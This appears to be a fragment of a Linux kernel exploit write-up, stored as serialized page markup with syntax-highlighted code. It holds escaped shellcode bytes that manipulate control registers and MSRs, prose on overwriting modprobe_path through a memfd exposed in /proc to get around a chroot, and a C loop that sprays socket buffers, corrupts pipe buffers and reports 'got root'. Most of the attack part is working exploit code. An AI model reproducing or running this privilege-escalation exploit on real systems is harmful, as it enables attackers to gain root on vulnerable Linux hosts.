0x2a",{"type":26,"tag":137,"props":62129,"children":62130},{"style":5601},[62131],{"type":32,"value":1108},{"type":26,"tag":137,"props":62133,"children":62134},{"style":6837},[62135],{"type":32,"value":22653},{"type":26,"tag":137,"props":62137,"children":62138},{"style":50975},[62139],{"type":32,"value":62140},"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00",{"type":26,"tag":137,"props":62142,"children":62143},{"style":6837},[62144],{"type":32,"value":22653},{"type":26,"tag":137,"props":62146,"children":62147},{"style":5601},[62148],{"type":32,"value":1108},{"type":26,"tag":137,"props":62150,"children":62151},{"style":5626},[62152],{"type":32,"value":62153},"24",{"type":26,"tag":137,"props":62155,"children":62156},{"style":5601},[62157],{"type":32,"value":5671},{"type":26,"tag":137,"props":62159,"children":62160},{"style":5590},[62161],{"type":32,"value":11161},{"type":26,"tag":137,"props":62163,"children":62164},{"style":5626},[62165],{"type":32,"value":5629},{"type":26,"tag":137,"props":62167,"children":62168},{"style":5590},[62169],{"type":32,"value":55287},{"type":26,"tag":137,"props":62171,"children":62172},{"class":5559,"line":6270},[62173,62177,62181,62185,62190,62194,62198,62203,62207,62211,62216,62220,62224,62228],{"type":26,"tag":137,"props":62174,"children":62175},{"style":5682},[62176],{"type":32,"value":61771},{"type":26,"tag":137,"props":62178,"children":62179},{"style":5601},[62180],{"type":32,"value":61713},{"type":26,"tag":137,"props":62182,"children":62183},{"style":5590},[62184],{"type":32,"value":356},{"type":26,"tag":137,"props":62186,"children":62187},{"style":5626},[62188],{"type":32,"value":62189}," 0x45",{"type":26,"tag":137,"props":62191,"children":62192},{"style":5601},[62193],{"type":32,"value":1108},{"type":26,"tag":137,"props":62195,"children":62196},{"style":6837},[62197],{"type":32,"value":22653},{"type":26,"tag":137,"props":62199,"children":62200},{"style":50975},[62201],{"type":32,"value":62202},"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00",{"type":26,"tag":137,"props":62204,"children":62205},{"style":6837},[62206],{"type":32,"value":22653},{"type":26,"tag":137,"props":62208,"children":62209},{"style":5601},[62210],{"type":32,"value":1108},{"type":26,"tag":137,"props":62212,"children":62213},{"style":5626},[62214],{"type":32,"value":62215},"15",{"type":26,"tag":137,"props":62217,"children":62218},{"style":5601},[62219],{"type":32,"value":5671},{"type":26,"tag":137,"props":62221,"children":62222},{"style":5590},[62223],{"type":32,"value":11161},{"type":26,"tag":137,"props":62225,"children":62226},{"style":5626},[62227],{"type":32,"value":5629},{"type":26,"tag":137,"props":62229,"children":62230},{"style":5590},[62231],{"type":32,"value":55287},{"type":26,"tag":137,"props":62233,"children":62234},{"class":5559,"line":6279},[62235,62239,62243,62247,62252,62256,62260,62265,62269,62273,62277,62281,62285,62289],{"type":26,"tag":137,"props":62236,"children":62237},{"style":5682},[62238],{"type":32,"value":61771},{"type":26,"tag":137,"props":62240,"children":62241},{"style":5601},[62242],{"type":32,"value":61713},{"type":26,"tag":137,"props":62244,"children":62245},{"style":5590},[62246],{"type":32,"value":356},{"type":26,"tag":137,"props":62248,"children":62249},{"style":5626},[62250],{"type":32,"value":62251}," 0x55",{"type":26,"tag":137,"props":62253,"children":62254},{"style":5601},[62255],{"type":32,"value":1108},{"type":26,"tag":137,"props":62257,"children":62258},{"style":6837},[62259],{"type":32,"value":22653},{"type":26,"tag":137,"props":62261,"children":62262},{"style":50975},[62263],{"type":32,"value":62264},"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8",{"type":26,"tag":137,"props":62266,"children":62267},{"style":6837},[62268],{"type":32,"value":22653},{"type":26,"tag":137,"props":62270,"children":62271},{"style":5601},[62272],{"type":32,"value":1108},{"type":26,"tag":137,"props":62274,"children":62275},{"style":5626},[62276],{"type":32,"value":6663},{"type":26,"tag":137,"props":62278,"children":62279},{"style":5601},[62280],{"type":32,"value":5671},{"type":26,"tag":137,"props":62282,"children":62283},{"style":5590},[62284],{"type":32,"value":11161},{"type":26,"tag":137,"props":62286,"children":62287},{"style":5626},[62288],{"type":32,"value":5629},{"type":26,"tag":137,"props":62290,"children":62291},{"style":5590},[62292],{"type":32,"value":55287},{"type":26,"tag":137,"props":62294,"children":62295},{"class":5559,"line":6288},[62296,62300,62304,62308,62313,62317,62321,62326,62330,62334,62338,62342,62346,62350],{"type":26,"tag":137,"props":62297,"children":62298},{"style":5682},[62299],{"type":32,"value":61771},{"type":26,"tag":137,"props":62301,"children":62302},{"style":5601},[62303],{"type":32,"value":61713},{"type":26,"tag":137,"props":62305,"children":62306},{"style":5590},[62307],{"type":32,"value":356},{"type":26,"tag":137,"props":62309,"children":62310},{"style":5626},[62311],{"type":32,"value":62312}," 0x61",{"type":26,"tag":137,"props":62314,"children":62315},{"style":5601},[62316],{"type":32,"value":1108},{"type":26,"tag":137,"props":62318,"children":62319},{"style":6837},[62320],{"type":32,"value":22653},{"type":26,"tag":137,"props":62322,"children":62323},{"style":50975},[62324],{"type":32,"value":62325},"\\x31\\xd2\\x0f\\x30\\xe8",{"type":26,"tag":137,"props":62327,"children":62328},{"style":6837},[62329],{"type":32,"value":22653},{"type":26,"tag":137,"props":62331,"children":62332},{"style":5601},[62333],{"type":32,"value":1108},{"type":26,"tag":137,"props":62335,"children":62336},{"style":5626},[62337],{"type":32,"value":20701},{"type":26,"tag":137,"props":62339,"children":62340},{"style":5601},[62341],{"type":32,"value":5671},{"type":26,"tag":137,"props":62343,"children":62344},{"style":5590},[62345],{"type":32,"value":11161},{"type":26,"tag":137,"props":62347,"children":62348},{"style":5626},[62349],{"type":32,"value":5629},{"type":26,"tag":137,"props":62351,"children":62352},{"style":5590},[62353],{"type":32,"value":55287},{"type":26,"tag":137,"props":62355,"children":62356},{"class":5559,"line":6355},[62357,62361,62365,62369,62374,62378,62382,62387,62391,62395,62399,62403,62407,62411],{"type":26,"tag":137,"props":62358,"children":62359},{"style":5682},[62360],{"type":32,"value":61771},{"type":26,"tag":137,"props":62362,"children":62363},{"style":5601},[62364],{"type":32,"value":61713},{"type":26,"tag":137,"props":62366,"children":62367},{"style":5590},[62368],{"type":32,"value":356},{"type":26,"tag":137,"props":62370,"children":62371},{"style":5626},[62372],{"type":32,"value":62373}," 0x6a",{"type":26,"tag":137,"props":62375,"children":62376},{"style":5601},[62377],{"type":32,"value":1108},{"type":26,"tag":137,"props":62379,"children":62380},{"style":6837},[62381],{"type":32,"value":22653},{"type":26,"tag":137,"props":62383,"children":62384},{"style":50975},[62385],{"type":32,"value":62386},"\\x48\\xc7\\xc6",{"type":26,"tag":137,"props":62388,"children":62389},{"style":6837},[62390],{"type":32,"value":22653},{"type":26,"tag":137,"props":62392,"children":62393},{"style":5601},[62394],{"type":32,"value":1108},{"type":26,"tag":137,"props":62396,"children":62397},{"style":5626},[62398],{"type":32,"value":344},{"type":26,"tag":137,"props":62400,"children":62401},{"style":5601},[62402],{"type":32,"value":5671},{"type":26,"tag":137,"props":62404,"children":62405},{"style":5590},[62406],{"type":32,"value":11161},{"type":26,"tag":137,"props":62408,"children":62409},{"style":5626},[62410],{"type":32,"value":5629},{"type":26,"tag":137,"props":62412,"children":62413},{"style":5590},[62414],{"type":32,"value":55287},{"type":26,"tag":137,"props":62416,"children":62417},{"class":5559,"line":6363},[62418,62422,62426,62430,62435,62439,62443,62448,62452,62456,62460,62464,62468,62472],{"type":26,"tag":137,"props":62419,"children":62420},{"style":5682},[62421],{"type":32,"value":61771},{"type":26,"tag":137,"props":62423,"children":62424},{"style":5601},[62425],{"type":32,"value":61713},{"type":26,"tag":137,"props":62427,"children":62428},{"style":5590},[62429],{"type":32,"value":356},{"type":26,"tag":137,"props":62431,"children":62432},{"style":5626},[62433],{"type":32,"value":62434}," 0x71",{"type":26,"tag":137,"props":62436,"children":62437},{"style":5601},[62438],{"type":32,"value":1108},{"type":26,"tag":137,"props":62440,"children":62441},{"style":6837},[62442],{"type":32,"value":22653},{"type":26,"tag":137,"props":62444,"children":62445},{"style":50975},[62446],{"type":32,"value":62447},"\\x48\\xc7\\xc0\\x80\\x00\\x00",{"type":26,"tag":137,"props":62449,"children":62450},{"style":6837},[62451],{"type":32,"value":22653},{"type":26,"tag":137,"props":62453,"children":62454},{"style":5601},[62455],{"type":32,"value":1108},{"type":26,"tag":137,"props":62457,"children":62458},{"style":5626},[62459],{"type":32,"value":21013},{"type":26,"tag":137,"props":62461,"children":62462},{"style":5601},[62463],{"type":32,"value":5671},{"type":26,"tag":137,"props":62465,"children":62466},{"style":5590},[62467],{"type":32,"value":11161},{"type":26,"tag":137,"props":62469,"children":62470},{"style":5626},[62471],{"type":32,"value":5629},{"type":26,"tag":137,"props":62473,"children":62474},{"style":5590},[62475],{"type":32,"value":55287},{"type":26,"tag":137,"props":62477,"children":62478},{"class":5559,"line":6393},[62479,62483,62487,62491,62496,62500,62504,62509,62513,62517,62521,62525,62529,62533],{"type":26,"tag":137,"props":62480,"children":62481},{"style":5682},[62482],{"type":32,"value":61771},{"type":26,"tag":137,"props":62484,"children":62485},{"style":5601},[62486],{"type":32,"value":61713},{"type":26,"tag":137,"props":62488,"children":62489},{"style":5590},[62490],{"type":32,"value":356},{"type":26,"tag":137,"props":62492,"children":62493},{"style":5626},[62494],{"type":32,"value":62495}," 0x78",{"type":26,"tag":137,"props":62497,"children":62498},{"style":5601},[62499],{"type":32,"value":1108},{"type":26,"tag":137,"props":62501,"children":62502},{"style":6837},[62503],{"type":32,"value":22653},{"type":26,"tag":137,"props":62505,"children":62506},{"style":50975},[62507],{"type":32,"value":62508},"\\xff\\xe0",{"type":26,"tag":137,"props":62510,"children":62511},{"style":6837},[62512],{"type":32,"value":22653},{"type":26,"tag":137,"props":62514,"children":62515},{"style":5601},[62516],{"type":32,"value":1108},{"type":26,"tag":137,"props":62518,"children":62519},{"style":5626},[62520],{"type":32,"value":277},{"type":26,"tag":137,"props":62522,"children":62523},{"style":5601},[62524],{"type":32,"value":5671},{"type":26,"tag":137,"props":62526,"children":62527},{"style":5590},[62528],{"type":32,"value":11161},{"type":26,"tag":137,"props":62530,"children":62531},{"style":5626},[62532],{"type":32,"value":5629},{"type":26,"tag":137,"props":62534,"children":62535},{"style":5601},[62536],{"type":32,"value":5742},{"type":26,"tag":137,"props":62538,"children":62539},{"class":5559,"line":6401},[62540,62544,62548],{"type":26,"tag":137,"props":62541,"children":62542},{"style":5610},[62543],{"type":32,"value":18336},{"type":26,"tag":137,"props":62545,"children":62546},{"style":5573},[62547],{"type":32,"value":15060},{"type":26,"tag":137,"props":62549,"children":62550},{"style":5601},[62551],{"type":32,"value":5604},{"type":26,"tag":137,"props":62553,"children":62554},{"class":5559,"line":6433},[62555],{"type":26,"tag":137,"props":62556,"children":62557},{"emptyLinePlaceholder":18},[62558],{"type":32,"value":6276},{"type":26,"tag":137,"props":62560,"children":62561},{"class":5559,"line":6441},[62562,62566,62570],{"type":26,"tag":137,"props":62563,"children":62564},{"style":5610},[62565],{"type":32,"value":19582},{"type":26,"tag":137,"props":62567,"children":62568},{"style":5573},[62569],{"type":32,"value":11645},{"type":26,"tag":137,"props":62571,"children":62572},{"style":5601},[62573],{"type":32,"value":5604},{"type":26,"tag":137,"props":62575,"children":62576},{"class":5559,"line":6501},[62577],{"type":26,"tag":137,"props":62578,"children":62579},{"style":5601},[62580],{"type":32,"value":6507},{"type":26,"tag":137,"props":62582,"children":62583},{"class":5559,"line":11634},[62584],{"type":26,"tag":137,"props":62585,"children":62586},{"style":5601},[62587],{"type":32,"value":12908},{"type":26,"tag":118,"props":62589,"children":62591},{"id":62590},"overwriting-modprobe_path",[62592,62594],{"type":32,"value":62593},"Overwriting ",{"type":26,"tag":130,"props":62595,"children":62597},{"className":62596},[],[62598],{"type":32,"value":60979},{"type":26,"tag":35,"props":62600,"children":62601},{},[62602,62604,62610],{"type":32,"value":62603},"Finding the ",{"type":26,"tag":130,"props":62605,"children":62607},{"className":62606},[],[62608],{"type":32,"value":62609},"/sbin/modprobe",{"type":32,"value":62611}," string in kernel memory and replacing it with a controlled value that points to a file we own finally becomes relatively trivial.",{"type":26,"tag":35,"props":62613,"children":62614},{},[62615,62617,62623],{"type":32,"value":62616},"A very well-known trick for this to work, although we are running in a chroot without being able to create files at the root filesystem, is using a memfd exposed through ",{"type":26,"tag":130,"props":62618,"children":62620},{"className":62619},[],[62621],{"type":32,"value":62622},"/proc/\u003Cpid>/fd/\u003Cn>.",{"type":32,"value":62624}," It's worth adding that, given that our pid outside the unprivileged namespace is unknown to us, we brute-force it.",{"type":26,"tag":5512,"props":62626,"children":62628},{"className":31704,"code":62627,"language":31706,"meta":7,"style":7},"[...]\n    puts(\"[*] overwrite modprobe_path\");\n    for (int i = 0; i \u003C 4194304; i++)\n    {\n        pipebuf->page = modprobe_page;\n        pipebuf->offset = modprobe_off;\n        pipebuf->len = 0;\n        for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n        {\n            if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n            {\n                perror(\"[-] write(socket)\");\n                break;\n            }\n        }\n\n        memset(&data, 0, PAGE_SIZE);\n        snprintf(fd_path, sizeof(fd_path), \"/proc/%i/fd/%i\", i, modprobe_fd);\n\n        lseek(modprobe_fd, 0, SEEK_SET);\n        dprintf(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n\n        if (write(pfd[pipe_idx][1], fd_path, 32) \u003C 0)\n        {\n            perror(\"\\n[-] write(pipe)\");\n        }\n\n        if (check_modprobe(fd_path))\n        {\n            puts(\"[-] failed to overwrite modprobe\");\n            break;\n        }\n\n        if (trigger_modprobe(status_fd))\n        {\n            puts(\"\\n[+] got root\");\n            goto out;\n        }\n\n        for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n        {\n            if (read(sock[i][1], leak, 1024 - 320) \u003C 0)\n            {\n                perror(\"[-] read(socket)\");\n                return -1;\n            }\n        }\n    }\n    puts(\"[-] fake modprobe failed\");\n[...]\n",[62629],{"type":26,"tag":130,"props":62630,"children":62631},{"__ignoreMap":7},[62632,62639,62661,62669,62676,62684,62692,62700,62708,62715,62723,62730,62768,62779,62786,62793,62800,62827,62858,62865,62887,62900,62907,62965,62972,63000,63007,63014,63035,63042,63063,63074,63081,63088,63109,63116,63144,63157,63164,63171,63220,63227,63295,63302,63323,63343,63350,63357,63364,63384],{"type":26,"tag":137,"props":62633,"children":62634},{"class":5559,"line":5560},[62635],{"type":26,"tag":137,"props":62636,"children":62637},{"style":5601},[62638],{"type":32,"value":12908},{"type":26,"tag":137,"props":62640,"children":62641},{"class":5559,"line":5412},[62642,62647,62652,62657],{"type":26,"tag":137,"props":62643,"children":62644},{"style":5601},[62645],{"type":32,"value":62646},"    puts(\"[*] ",{"type":26,"tag":137,"props":62648,"children":62649},{"style":6009},[62650],{"type":32,"value":62651},"overwrite",{"type":26,"tag":137,"props":62653,"children":62654},{"style":6009},[62655],{"type":32,"value":62656}," modprobe_path",{"type":26,"tag":137,"props":62658,"children":62659},{"style":6837},[62660],{"type":32,"value":58893},{"type":26,"tag":137,"props":62662,"children":62663},{"class":5559,"line":5417},[62664],{"type":26,"tag":137,"props":62665,"children":62666},{"style":6837},[62667],{"type":32,"value":62668},"    for (int i = 0; i \u003C 4194304; i++)\n",{"type":26,"tag":137,"props":62670,"children":62671},{"class":5559,"line":5642},[62672],{"type":26,"tag":137,"props":62673,"children":62674},{"style":6837},[62675],{"type":32,"value":31781},{"type":26,"tag":137,"props":62677,"children":62678},{"class":5559,"line":5745},[62679],{"type":26,"tag":137,"props":62680,"children":62681},{"style":6837},[62682],{"type":32,"value":62683},"        pipebuf->page = modprobe_page;\n",{"type":26,"tag":137,"props":62685,"children":62686},{"class":5559,"line":5850},[62687],{"type":26,"tag":137,"props":62688,"children":62689},{"style":6837},[62690],{"type":32,"value":62691},"        pipebuf->offset = modprobe_off;\n",{"type":26,"tag":137,"props":62693,"children":62694},{"class":5559,"line":5878},[62695],{"type":26,"tag":137,"props":62696,"children":62697},{"style":6837},[62698],{"type":32,"value":62699},"        pipebuf->len = 0;\n",{"type":26,"tag":137,"props":62701,"children":62702},{"class":5559,"line":5891},[62703],{"type":26,"tag":137,"props":62704,"children":62705},{"style":6837},[62706],{"type":32,"value":62707},"        for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n",{"type":26,"tag":137,"props":62709,"children":62710},{"class":5559,"line":5909},[62711],{"type":26,"tag":137,"props":62712,"children":62713},{"style":6837},[62714],{"type":32,"value":34254},{"type":26,"tag":137,"props":62716,"children":62717},{"class":5559,"line":5930},[62718],{"type":26,"tag":137,"props":62719,"children":62720},{"style":6837},[62721],{"type":32,"value":62722},"            if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n",{"type":26,"tag":137,"props":62724,"children":62725},{"class":5559,"line":5939},[62726],{"type":26,"tag":137,"props":62727,"children":62728},{"style":6837},[62729],{"type":32,"value":34290},{"type":26,"tag":137,"props":62731,"children":62732},{"class":5559,"line":6191},[62733,62738,62742,62746,62750,62755,62759,62763],{"type":26,"tag":137,"props":62734,"children":62735},{"style":6837},[62736],{"type":32,"value":62737},"                perror(\"",{"type":26,"tag":137,"props":62739,"children":62740},{"style":5601},[62741],{"type":32,"value":3016},{"type":26,"tag":137,"props":62743,"children":62744},{"style":5590},[62745],{"type":32,"value":6908},{"type":26,"tag":137,"props":62747,"children":62748},{"style":5601},[62749],{"type":32,"value":11247},{"type":26,"tag":137,"props":62751,"children":62752},{"style":6009},[62753],{"type":32,"value":62754},"write",{"type":26,"tag":137,"props":62756,"children":62757},{"style":5601},[62758],{"type":32,"value":165},{"type":26,"tag":137,"props":62760,"children":62761},{"style":6009},[62762],{"type":32,"value":44536},{"type":26,"tag":137,"props":62764,"children":62765},{"style":5601},[62766],{"type":32,"value":62767},")\");\n",{"type":26,"tag":137,"props":62769,"children":62770},{"class":5559,"line":6208},[62771,62775],{"type":26,"tag":137,"props":62772,"children":62773},{"style":5610},[62774],{"type":32,"value":61561},{"type":26,"tag":137,"props":62776,"children":62777},{"style":5601},[62778],{"type":32,"value":5604},{"type":26,"tag":137,"props":62780,"children":62781},{"class":5559,"line":6225},[62782],{"type":26,"tag":137,"props":62783,"children":62784},{"style":5601},[62785],{"type":32,"value":61486},{"type":26,"tag":137,"props":62787,"children":62788},{"class":5559,"line":6238},[62789],{"type":26,"tag":137,"props":62790,"children":62791},{"style":5601},[62792],{"type":32,"value":5936},{"type":26,"tag":137,"props":62794,"children":62795},{"class":5559,"line":6247},[62796],{"type":26,"tag":137,"props":62797,"children":62798},{"emptyLinePlaceholder":18},[62799],{"type":32,"value":6276},{"type":26,"tag":137,"props":62801,"children":62802},{"class":5559,"line":6270},[62803,62807,62811,62815,62819,62823],{"type":26,"tag":137,"props":62804,"children":62805},{"style":5682},[62806],{"type":32,"value":57220},{"type":26,"tag":137,"props":62808,"children":62809},{"style":5601},[62810],{"type":32,"value":165},{"type":26,"tag":137,"props":62812,"children":62813},{"style":5590},[62814],{"type":32,"value":5694},{"type":26,"tag":137,"props":62816,"children":62817},{"style":5601},[62818],{"type":32,"value":61372},{"type":26,"tag":137,"props":62820,"children":62821},{"style":5626},[62822],{"type":32,"value":1817},{"type":26,"tag":137,"props":62824,"children":62825},{"style":5601},[62826],{"type":32,"value":61381},{"type":26,"tag":137,"props":62828,"children":62829},{"class":5559,"line":6279},[62830,62834,62839,62843,62848,62853],{"type":26,"tag":137,"props":62831,"children":62832},{"style":5682},[62833],{"type":32,"value":57920},{"type":26,"tag":137,"props":62835,"children":62836},{"style":5601},[62837],{"type":32,"value":62838},"(fd_path, ",{"type":26,"tag":137,"props":62840,"children":62841},{"style":5573},[62842],{"type":32,"value":57930},{"type":26,"tag":137,"props":62844,"children":62845},{"style":5601},[62846],{"type":32,"value":62847},"(fd_path), ",{"type":26,"tag":137,"props":62849,"children":62850},{"style":6837},[62851],{"type":32,"value":62852},"\"/proc/%i/fd/%i\"",{"type":26,"tag":137,"props":62854,"children":62855},{"style":5601},[62856],{"type":32,"value":62857},", i, modprobe_fd);\n",{"type":26,"tag":137,"props":62859,"children":62860},{"class":5559,"line":6288},[62861],{"type":26,"tag":137,"props":62862,"children":62863},{"emptyLinePlaceholder":18},[62864],{"type":32,"value":6276},{"type":26,"tag":137,"props":62866,"children":62867},{"class":5559,"line":6355},[62868,62873,62878,62882],{"type":26,"tag":137,"props":62869,"children":62870},{"style":5682},[62871],{"type":32,"value":62872},"        lseek",{"type":26,"tag":137,"props":62874,"children":62875},{"style":5601},[62876],{"type":32,"value":62877},"(modprobe_fd, ",{"type":26,"tag":137,"props":62879,"children":62880},{"style":5626},[62881],{"type":32,"value":1817},{"type":26,"tag":137,"props":62883,"children":62884},{"style":5601},[62885],{"type":32,"value":62886},", SEEK_SET);\n",{"type":26,"tag":137,"props":62888,"children":62889},{"class":5559,"line":6363},[62890,62895],{"type":26,"tag":137,"props":62891,"children":62892},{"style":5682},[62893],{"type":32,"value":62894},"        dprintf",{"type":26,"tag":137,"props":62896,"children":62897},{"style":5601},[62898],{"type":32,"value":62899},"(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n",{"type":26,"tag":137,"props":62901,"children":62902},{"class":5559,"line":6393},[62903],{"type":26,"tag":137,"props":62904,"children":62905},{"emptyLinePlaceholder":18},[62906],{"type":32,"value":6276},{"type":26,"tag":137,"props":62908,"children":62909},{"class":5559,"line":6401},[62910,62914,62918,62922,62926,62930,62935,62939,62944,62949,62953,62957,62961],{"type":26,"tag":137,"props":62911,"children":62912},{"style":5610},[62913],{"type":32,"value":5856},{"type":26,"tag":137,"props":62915,"children":62916},{"style":5601},[62917],{"type":32,"value":4625},{"type":26,"tag":137,"props":62919,"children":62920},{"style":5682},[62921],{"type":32,"value":62754},{"type":26,"tag":137,"props":62923,"children":62924},{"style":5601},[62925],{"type":32,"value":165},{"type":26,"tag":137,"props":62927,"children":62928},{"style":5584},[62929],{"type":32,"value":61425},{"type":26,"tag":137,"props":62931,"children":62932},{"style":5601},[62933],{"type":32,"value":62934},"[pipe_idx][",{"type":26,"tag":137,"props":62936,"children":62937},{"style":5626},[62938],{"type":32,"value":878},{"type":26,"tag":137,"props":62940,"children":62941},{"style":5601},[62942],{"type":32,"value":62943},"], fd_path, ",{"type":26,"tag":137,"props":62945,"children":62946},{"style":5626},[62947],{"type":32,"value":62948},"32",{"type":26,"tag":137,"props":62950,"children":62951},{"style":5601},[62952],{"type":32,"value":5671},{"type":26,"tag":137,"props":62954,"children":62955},{"style":5590},[62956],{"type":32,"value":8391},{"type":26,"tag":137,"props":62958,"children":62959},{"style":5626},[62960],{"type":32,"value":5629},{"type":26,"tag":137,"props":62962,"children":62963},{"style":5601},[62964],{"type":32,"value":5742},{"type":26,"tag":137,"props":62966,"children":62967},{"class":5559,"line":6433},[62968],{"type":26,"tag":137,"props":62969,"children":62970},{"style":5601},[62971],{"type":32,"value":34254},{"type":26,"tag":137,"props":62973,"children":62974},{"class":5559,"line":6441},[62975,62979,62983,62987,62991,62996],{"type":26,"tag":137,"props":62976,"children":62977},{"style":5682},[62978],{"type":32,"value":60498},{"type":26,"tag":137,"props":62980,"children":62981},{"style":5601},[62982],{"type":32,"value":165},{"type":26,"tag":137,"props":62984,"children":62985},{"style":6837},[62986],{"type":32,"value":22653},{"type":26,"tag":137,"props":62988,"children":62989},{"style":50975},[62990],{"type":32,"value":50978},{"type":26,"tag":137,"props":62992,"children":62993},{"style":6837},[62994],{"type":32,"value":62995},"[-] write(pipe)\"",{"type":26,"tag":137,"props":62997,"children":62998},{"style":5601},[62999],{"type":32,"value":6430},{"type":26,"tag":137,"props":63001,"children":63002},{"class":5559,"line":6501},[63003],{"type":26,"tag":137,"props":63004,"children":63005},{"style":5601},[63006],{"type":32,"value":5936},{"type":26,"tag":137,"props":63008,"children":63009},{"class":5559,"line":11634},[63010],{"type":26,"tag":137,"props":63011,"children":63012},{"emptyLinePlaceholder":18},[63013],{"type":32,"value":6276},{"type":26,"tag":137,"props":63015,"children":63016},{"class":5559,"line":11652},[63017,63021,63025,63030],{"type":26,"tag":137,"props":63018,"children":63019},{"style":5610},[63020],{"type":32,"value":5856},{"type":26,"tag":137,"props":63022,"children":63023},{"style":5601},[63024],{"type":32,"value":4625},{"type":26,"tag":137,"props":63026,"children":63027},{"style":5682},[63028],{"type":32,"value":63029},"check_modprobe",{"type":26,"tag":137,"props":63031,"children":63032},{"style":5601},[63033],{"type":32,"value":63034},"(fd_path))\n",{"type":26,"tag":137,"props":63036,"children":63037},{"class":5559,"line":11697},[63038],{"type":26,"tag":137,"props":63039,"children":63040},{"style":5601},[63041],{"type":32,"value":34254},{"type":26,"tag":137,"props":63043,"children":63044},{"class":5559,"line":11803},[63045,63050,63054,63059],{"type":26,"tag":137,"props":63046,"children":63047},{"style":5682},[63048],{"type":32,"value":63049},"            puts",{"type":26,"tag":137,"props":63051,"children":63052},{"style":5601},[63053],{"type":32,"value":165},{"type":26,"tag":137,"props":63055,"children":63056},{"style":6837},[63057],{"type":32,"value":63058},"\"[-] failed to overwrite modprobe\"",{"type":26,"tag":137,"props":63060,"children":63061},{"style":5601},[63062],{"type":32,"value":6430},{"type":26,"tag":137,"props":63064,"children":63065},{"class":5559,"line":26089},[63066,63070],{"type":26,"tag":137,"props":63067,"children":63068},{"style":5610},[63069],{"type":32,"value":5884},{"type":26,"tag":137,"props":63071,"children":63072},{"style":5601},[63073],{"type":32,"value":5604},{"type":26,"tag":137,"props":63075,"children":63076},{"class":5559,"line":26124},[63077],{"type":26,"tag":137,"props":63078,"children":63079},{"style":5601},[63080],{"type":32,"value":5936},{"type":26,"tag":137,"props":63082,"children":63083},{"class":5559,"line":26132},[63084],{"type":26,"tag":137,"props":63085,"children":63086},{"emptyLinePlaceholder":18},[63087],{"type":32,"value":6276},{"type":26,"tag":137,"props":63089,"children":63090},{"class":5559,"line":26140},[63091,63095,63099,63104],{"type":26,"tag":137,"props":63092,"children":63093},{"style":5610},[63094],{"type":32,"value":5856},{"type":26,"tag":137,"props":63096,"children":63097},{"style":5601},[63098],{"type":32,"value":4625},{"type":26,"tag":137,"props":63100,"children":63101},{"style":5682},[63102],{"type":32,"value":63103},"trigger_modprobe",{"type":26,"tag":137,"props":63105,"children":63106},{"style":5601},[63107],{"type":32,"value":63108},"(status_fd))\n",{"type":26,"tag":137,"props":63110,"children":63111},{"class":5559,"line":26149},[63112],{"type":26,"tag":137,"props":63113,"children":63114},{"style":5601},[63115],{"type":32,"value":34254},{"type":26,"tag":137,"props":63117,"children":63118},{"class":5559,"line":26191},[63119,63123,63127,63131,63135,63140],{"type":26,"tag":137,"props":63120,"children":63121},{"style":5682},[63122],{"type":32,"value":63049},{"type":26,"tag":137,"props":63124,"children":63125},{"style":5601},[63126],{"type":32,"value":165},{"type":26,"tag":137,"props":63128,"children":63129},{"style":6837},[63130],{"type":32,"value":22653},{"type":26,"tag":137,"props":63132,"children":63133},{"style":50975},[63134],{"type":32,"value":50978},{"type":26,"tag":137,"props":63136,"children":63137},{"style":6837},[63138],{"type":32,"value":63139},"[+] got root\"",{"type":26,"tag":137,"props":63141,"children":63142},{"style":5601},[63143],{"type":32,"value":6430},{"type":26,"tag":137,"props":63145,"children":63146},{"class":5559,"line":26224},[63147,63152],{"type":26,"tag":137,"props":63148,"children":63149},{"style":5610},[63150],{"type":32,"value":63151},"            goto",{"type":26,"tag":137,"props":63153,"children":63154},{"style":5601},[63155],{"type":32,"value":63156}," out;\n",{"type":26,"tag":137,"props":63158,"children":63159},{"class":5559,"line":26232},[63160],{"type":26,"tag":137,"props":63161,"children":63162},{"style":5601},[63163],{"type":32,"value":5936},{"type":26,"tag":137,"props":63165,"children":63166},{"class":5559,"line":26240},[63167],{"type":26,"tag":137,"props":63168,"children":63169},{"emptyLinePlaceholder":18},[63170],{"type":32,"value":6276},{"type":26,"tag":137,"props":63172,"children":63173},{"class":5559,"line":26249},[63174,63179,63183,63187,63191,63195,63199,63203,63207,63212,63216],{"type":26,"tag":137,"props":63175,"children":63176},{"style":5610},[63177],{"type":32,"value":63178},"        for",{"type":26,"tag":137,"props":63180,"children":63181},{"style":5601},[63182],{"type":32,"value":4625},{"type":26,"tag":137,"props":63184,"children":63185},{"style":5573},[63186],{"type":32,"value":21640},{"type":26,"tag":137,"props":63188,"children":63189},{"style":5601},[63190],{"type":32,"value":57147},{"type":26,"tag":137,"props":63192,"children":63193},{"style":5590},[63194],{"type":32,"value":289},{"type":26,"tag":137,"props":63196,"children":63197},{"style":5626},[63198],{"type":32,"value":5629},{"type":26,"tag":137,"props":63200,"children":63201},{"style":5601},[63202],{"type":32,"value":53836},{"type":26,"tag":137,"props":63204,"children":63205},{"style":5590},[63206],{"type":32,"value":8391},{"type":26,"tag":137,"props":63208,"children":63209},{"style":5601},[63210],{"type":32,"value":63211}," SKBUF_SPRAY; 